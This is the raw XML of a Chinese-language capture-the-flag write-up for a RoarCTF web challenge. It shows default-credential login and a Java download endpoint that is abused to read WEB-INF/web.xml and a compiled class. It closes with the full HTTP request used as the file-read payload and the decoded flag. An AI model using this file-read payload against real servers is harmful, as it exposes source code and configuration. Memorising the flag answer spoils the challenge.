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860F1" w14:textId="41EB8526" w:rsidR="005E3C3E" w:rsidRDefault="00D56657">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>题目BBR</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="035FD980" w14:textId="189E0EEE" w:rsidR="00D56657" w:rsidRDefault="00D56657">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="222E3E4B" wp14:editId="56CEA30E">
            <wp:extent cx="5274310" cy="2766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75BD" w14:textId="3AAED1DD" w:rsidR="008172C1" w:rsidRDefault="008172C1">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>登陆失败</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FB5D517" w14:textId="030BF43D" w:rsidR="00147906" w:rsidRDefault="00147906">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="495C116E" wp14:editId="39BF82DC">
            <wp:extent cx="5274310" cy="2651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721E" w14:textId="7D570496" w:rsidR="00147906" w:rsidRDefault="009740D1">
      <w:r>
        <w:t>admin admin888</w:t>
      </w:r>
      <w:r w:rsidR="00147906">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>登陆成功</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C9CE246" w14:textId="3532E7BC" w:rsidR="00147906" w:rsidRDefault="009740D1">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5498551E" wp14:editId="63C91B8D">
            <wp:extent cx="5274310" cy="3827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E645" w14:textId="4EEF3464" w:rsidR="009740D1" w:rsidRDefault="008D5B5F">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>下载帮助文档</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49B9AE07" w14:textId="35D521C3" w:rsidR="00B5150A" w:rsidRDefault="009E1ACD">
      <w:hyperlink r:id="rId7" w:history="1">
        <w:r w:rsidR="00B5150A">
          <w:rPr>
            <w:rStyle w:val="a3"/>
          </w:rPr>
          <w:t>http://192.168.1.5:8080/Download?filename=help.docx</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="47DC92DF" w14:textId="16CA6A97" w:rsidR="008D5B5F" w:rsidRDefault="008D5B5F">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="52E912D7" wp14:editId="7A409822">
            <wp:extent cx="5274310" cy="30283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F25A" w14:textId="77BD8B7D" w:rsidR="00C10F38" w:rsidRDefault="00C10F38">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">误导操作 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C10F38">
        <w:t>java.io.FileNotFoundException</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="566C331C" w14:textId="3D9D239C" w:rsidR="008A6075" w:rsidRDefault="00C10F38">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1C15655A" wp14:editId="6C370BBE">
            <wp:extent cx="5274310" cy="1892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F269" w14:textId="583F7EB5" w:rsidR="00C10F38" w:rsidRDefault="00C10F38"/>
    <w:p w14:paraId="16ECDA6C" w14:textId="5E286857" w:rsidR="00C10F38" w:rsidRDefault="007B5C9F">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>经过各种试get</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> method filename</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参数无果</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F37B8A2" w14:textId="7E1A1299" w:rsidR="00DC7D6A" w:rsidRDefault="00DC7D6A">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>尝试p</w:t>
      </w:r>
      <w:r>
        <w:t>ost</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，发现泄漏包名</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49487D67" w14:textId="5CBFEDAA" w:rsidR="00DC7D6A" w:rsidRDefault="00DC7D6A">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DC7D6A">
        <w:t>com.wm.ctf.DownloadController.doPost</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DC7D6A">
        <w:t>(DownloadController.java:24)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F9A4D49" w14:textId="7654C733" w:rsidR="007B5C9F" w:rsidRDefault="00DC7D6A">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7388D823" wp14:editId="67951A8C">
            <wp:extent cx="5274310" cy="2205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DC79" w14:textId="407CC0E9" w:rsidR="006653A7" w:rsidRDefault="006653A7">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>http头需加</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006653A7">
        <w:t>Content-Type:application</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006653A7">
        <w:t>/x-www-form-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006653A7">
        <w:t>urlencoded</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0D018F20" w14:textId="7A6B2DB2" w:rsidR="006653A7" w:rsidRDefault="006653A7">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>否则无法下载文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CC510BA" w14:textId="4B734043" w:rsidR="006653A7" w:rsidRDefault="00951E4C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3726B70B" wp14:editId="5C598746">
            <wp:extent cx="5274310" cy="2002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1F35" w14:textId="32CBD5B1" w:rsidR="0035291C" w:rsidRDefault="0035291C" w:rsidP="006A6814">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>尝试h</w:t>
      </w:r>
      <w:r>
        <w:t>ex</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>还原</w:t>
      </w:r>
      <w:r>
        <w:t>help.docx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="428F7064" w14:textId="7B5644D0" w:rsidR="00E66749" w:rsidRDefault="006A6814">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="379ADF04" wp14:editId="5150C03A">
            <wp:extent cx="5274310" cy="28244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8C74" w14:textId="6E175C71" w:rsidR="00F77887" w:rsidRDefault="00F77887">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>以上测试无果</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11425DCE" w14:textId="75C37E5B" w:rsidR="00F77887" w:rsidRDefault="00BF6F80">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>接下来开始换思路构造其他下载</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67D35002" w14:textId="1ECA5A21" w:rsidR="00BF6F80" w:rsidRDefault="00BF6F80">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>上面得到包名</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2429906E" w14:textId="7D34C016" w:rsidR="00E66749" w:rsidRDefault="00BF6F80">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DC7D6A">
        <w:t>com.wm.ctf.DownloadController</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6BBA140F" w14:textId="00DCD67B" w:rsidR="00606543" w:rsidRDefault="009E6AC6">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>下载w</w:t>
      </w:r>
      <w:r>
        <w:t>eb.xml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="331CD286" w14:textId="2CB152BB" w:rsidR="009E6AC6" w:rsidRDefault="009E6AC6">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6E7B5501" wp14:editId="09B62B8C">
            <wp:extent cx="5274310" cy="22009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A49B" w14:textId="5AC80DE4" w:rsidR="009E6AC6" w:rsidRDefault="009E6AC6">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>发现/</w:t>
      </w:r>
      <w:r>
        <w:t>Flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47C9B75F" w14:textId="51CCC2FA" w:rsidR="009E6AC6" w:rsidRDefault="00314D70">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>访问</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3760C797" w14:textId="7FF51633" w:rsidR="00314D70" w:rsidRDefault="009E1ACD">
      <w:hyperlink r:id="rId14" w:history="1">
        <w:r w:rsidR="00314D70">
          <w:rPr>
            <w:rStyle w:val="a3"/>
          </w:rPr>
          <w:t>http://192.168.1.5:8080//Flag</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4B1A329B" w14:textId="213E8A27" w:rsidR="00314D70" w:rsidRDefault="00314D70">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0FB8D601" wp14:editId="29D454FA">
            <wp:extent cx="5274310" cy="25253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B4C2" w14:textId="2D195C0A" w:rsidR="00E86A9C" w:rsidRDefault="00E86A9C">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通过得到w</w:t>
      </w:r>
      <w:r>
        <w:t>eb.xml</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2829839B" w14:textId="40ECB656" w:rsidR="00E86A9C" w:rsidRDefault="00E86A9C">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>构造下载</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="541BDEC0" w14:textId="4C3D5FF7" w:rsidR="00E86A9C" w:rsidRDefault="00E86A9C"/>
    <w:p w14:paraId="337E40BA" w14:textId="77777777" w:rsidR="00E86A9C" w:rsidRDefault="00E86A9C" w:rsidP="00E86A9C">
      <w:r>
        <w:t xml:space="preserve">    &lt;servlet-mapping&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D85E93A" w14:textId="77777777" w:rsidR="00E86A9C" w:rsidRDefault="00E86A9C" w:rsidP="00E86A9C">
      <w:r>
        <w:t xml:space="preserve">        &lt;servlet-name&gt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>FlagController</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>&lt;/servlet-name&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65511EC0" w14:textId="77777777" w:rsidR="00E86A9C" w:rsidRDefault="00E86A9C" w:rsidP="00E86A9C">
      <w:r>
        <w:t xml:space="preserve">        &lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>-pattern&gt;/Flag&lt;/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>-pattern&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69975601" w14:textId="5DA2837E" w:rsidR="00E86A9C" w:rsidRDefault="00E86A9C" w:rsidP="00E86A9C">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;/servlet-mapping&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33F874B8" w14:textId="3E9B7202" w:rsidR="00E86A9C" w:rsidRDefault="00E86A9C" w:rsidP="00E86A9C">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6EC06B7B" w14:textId="77777777" w:rsidR="00E86A9C" w:rsidRDefault="00E86A9C" w:rsidP="00E86A9C">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DC7D6A">
        <w:t>com.wm.ctf.DownloadController</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="71A6B92C" w14:textId="241AB5E3" w:rsidR="00566554" w:rsidRDefault="00566554" w:rsidP="00566554"/>
    <w:p w14:paraId="2FC08455" w14:textId="2EDACBD7" w:rsidR="00566554" w:rsidRDefault="00566554" w:rsidP="00566554">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>懂j</w:t>
      </w:r>
      <w:r>
        <w:t>ava</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的知道编译过后的文件</w:t>
      </w:r>
      <w:r w:rsidR="00E87978">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是</w:t>
      </w:r>
      <w:r w:rsidR="00E87978">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00E87978">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
      <w:r w:rsidR="00E87978">
        <w:t>lass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ACAC628" w14:textId="3247B4A1" w:rsidR="00E87978" w:rsidRDefault="00E87978" w:rsidP="00566554">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>构造</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03E94335" w14:textId="2A065036" w:rsidR="00E87978" w:rsidRDefault="00E87978" w:rsidP="00566554">
      <w:r w:rsidRPr="00E87978">
        <w:t>WEB-INF/classes/com/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E87978">
        <w:t>wm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E87978">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E87978">
        <w:t>ctf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E87978">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E87978">
        <w:t>FlagController.class</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4F3FE44F" w14:textId="1DEC0B54" w:rsidR="002A108D" w:rsidRDefault="000962E3" w:rsidP="00566554">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>下载到</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E87978">
        <w:t>FlagController.class</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>字节码文件，无需h</w:t>
      </w:r>
      <w:r>
        <w:t>ex</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>还原c</w:t>
      </w:r>
      <w:r>
        <w:t>lass</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>反编译</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61834096" w14:textId="209D7C38" w:rsidR="000962E3" w:rsidRDefault="002971D0" w:rsidP="00566554">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="54B32FA8" wp14:editId="0485D765">
            <wp:extent cx="5274310" cy="23704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6106" w14:textId="064DC57D" w:rsidR="000962E3" w:rsidRDefault="000962E3" w:rsidP="00566554">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>发现返回包中有b</w:t>
      </w:r>
      <w:r>
        <w:t>ase64</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>加密</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="709E03C8" w14:textId="7CE3843D" w:rsidR="000962E3" w:rsidRDefault="0048134C" w:rsidP="00566554">
      <w:r w:rsidRPr="0048134C">
        <w:t>Um9hckNURnt3bS1mNzA1MDJjMS1iZDJiLTQ5ZGYtYWRlYy0zZmYzZWY1OWIwM2F9</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4910912F" w14:textId="4A3AD5EF" w:rsidR="007A70DC" w:rsidRDefault="007A70DC" w:rsidP="00566554">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>解密，拿到f</w:t>
      </w:r>
      <w:r>
        <w:t>lag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E2DFD94" w14:textId="769D706E" w:rsidR="007A70DC" w:rsidRDefault="005A134F" w:rsidP="00566554">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005A134F">
        <w:t>RoarCTF</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005A134F">
        <w:t>{wm-f70502c1-bd2b-49df-adec-3ff3ef59b03a}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B00770C" w14:textId="5BE40EAE" w:rsidR="007A70DC" w:rsidRDefault="007A70DC" w:rsidP="00566554"/>
    <w:p w14:paraId="571404D9" w14:textId="7F6E32BF" w:rsidR="007A70DC" w:rsidRDefault="007A70DC" w:rsidP="00566554">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>p</w:t>
      </w:r>
      <w:r>
        <w:t>ayload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="419DB56F" w14:textId="5A463A77" w:rsidR="007A70DC" w:rsidRDefault="007A70DC" w:rsidP="00566554"/>
    <w:p w14:paraId="22668350" w14:textId="77777777" w:rsidR="009E1ACD" w:rsidRDefault="009E1ACD" w:rsidP="009E1ACD">
      <w:r>
        <w:t>POST /Download HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51C86210" w14:textId="77777777" w:rsidR="009E1ACD" w:rsidRDefault="009E1ACD" w:rsidP="009E1ACD">
      <w:r>
        <w:t>Host: 192.168.1.5:8080</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F66DD07" w14:textId="77777777" w:rsidR="009E1ACD" w:rsidRDefault="009E1ACD" w:rsidP="009E1ACD">
      <w:r>
        <w:t>Upgrade-Insecure-Requests: 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="783A0784" w14:textId="77777777" w:rsidR="009E1ACD" w:rsidRDefault="009E1ACD" w:rsidP="009E1ACD">
      <w:r>
        <w:t xml:space="preserve">User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>AppleWebKit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/537.36 (KHTML, like Gecko) Chrome/75.0.3770.80 Safari/537.36</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="653F5913" w14:textId="77777777" w:rsidR="009E1ACD" w:rsidRDefault="009E1ACD" w:rsidP="009E1ACD">
      <w:r>
        <w:t>Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A490D23" w14:textId="77777777" w:rsidR="009E1ACD" w:rsidRDefault="009E1ACD" w:rsidP="009E1ACD">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Content-Type:application</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/x-www-form-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>urlencoded</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6F89CC62" w14:textId="77777777" w:rsidR="009E1ACD" w:rsidRDefault="009E1ACD" w:rsidP="009E1ACD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1472AF2F" w14:textId="77777777" w:rsidR="009E1ACD" w:rsidRDefault="009E1ACD" w:rsidP="009E1ACD">
      <w:r>
        <w:t xml:space="preserve">Accept-Language: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>zh-CN,zh;q</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=0.9,en;q=0.8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EB760FD" w14:textId="77777777" w:rsidR="009E1ACD" w:rsidRDefault="009E1ACD" w:rsidP="009E1ACD">
      <w:r>
        <w:t>Cookie: JSESSIONID=268D9E0C8061A14EE49E48761371052C</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C108541" w14:textId="77777777" w:rsidR="009E1ACD" w:rsidRDefault="009E1ACD" w:rsidP="009E1ACD">
      <w:r>
        <w:t>Connection: close</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10D4E310" w14:textId="77777777" w:rsidR="009E1ACD" w:rsidRDefault="009E1ACD" w:rsidP="009E1ACD">
      <w:r>
        <w:t>Content-Length: 56</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52178520" w14:textId="77777777" w:rsidR="009E1ACD" w:rsidRDefault="009E1ACD" w:rsidP="009E1ACD"/>
    <w:p w14:paraId="533DCA96" w14:textId="6B5AEBD2" w:rsidR="007A70DC" w:rsidRPr="0035291C" w:rsidRDefault="009E1ACD" w:rsidP="009E1ACD">
      <w:r>
        <w:t>filename=WEB-INF/classes/com/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>wm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ctf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>FlagController.class</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:sectPr w:rsidR="007A70DC" w:rsidRPr="00352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80"/>
    <w:rsid w:val="000962E3"/>
    <w:rsid w:val="00147906"/>
    <w:rsid w:val="002971D0"/>
    <w:rsid w:val="002A108D"/>
    <w:rsid w:val="00314D70"/>
    <w:rsid w:val="003234D6"/>
    <w:rsid w:val="0035291C"/>
    <w:rsid w:val="003A378C"/>
    <w:rsid w:val="0048134C"/>
    <w:rsid w:val="00566554"/>
    <w:rsid w:val="005A134F"/>
    <w:rsid w:val="00606543"/>
    <w:rsid w:val="006653A7"/>
    <w:rsid w:val="006A6814"/>
    <w:rsid w:val="007A70DC"/>
    <w:rsid w:val="007B5C9F"/>
    <w:rsid w:val="007B7880"/>
    <w:rsid w:val="008172C1"/>
    <w:rsid w:val="00875665"/>
    <w:rsid w:val="008A6075"/>
    <w:rsid w:val="008D5B5F"/>
    <w:rsid w:val="00930066"/>
    <w:rsid w:val="00951E4C"/>
    <w:rsid w:val="009740D1"/>
    <w:rsid w:val="009E1ACD"/>
    <w:rsid w:val="009E6AC6"/>
    <w:rsid w:val="00B5150A"/>
    <w:rsid w:val="00BF6F80"/>
    <w:rsid w:val="00C10F38"/>
    <w:rsid w:val="00D56657"/>
    <w:rsid w:val="00DC7D6A"/>
    <w:rsid w:val="00E66749"/>
    <w:rsid w:val="00E86A9C"/>
    <w:rsid w:val="00E87978"/>
    <w:rsid w:val="00F7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87C3"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{F6B18CEE-AC65-4B3E-A0F3-D8249D92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.5:8080/Download?filename=help.docx" TargetMode="Externa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192.168.1.5:8080/Fla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2019-08-30T11:12:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-08-30T12:41:00Z</dcterms:modified>
</cp:coreProperties>
</file>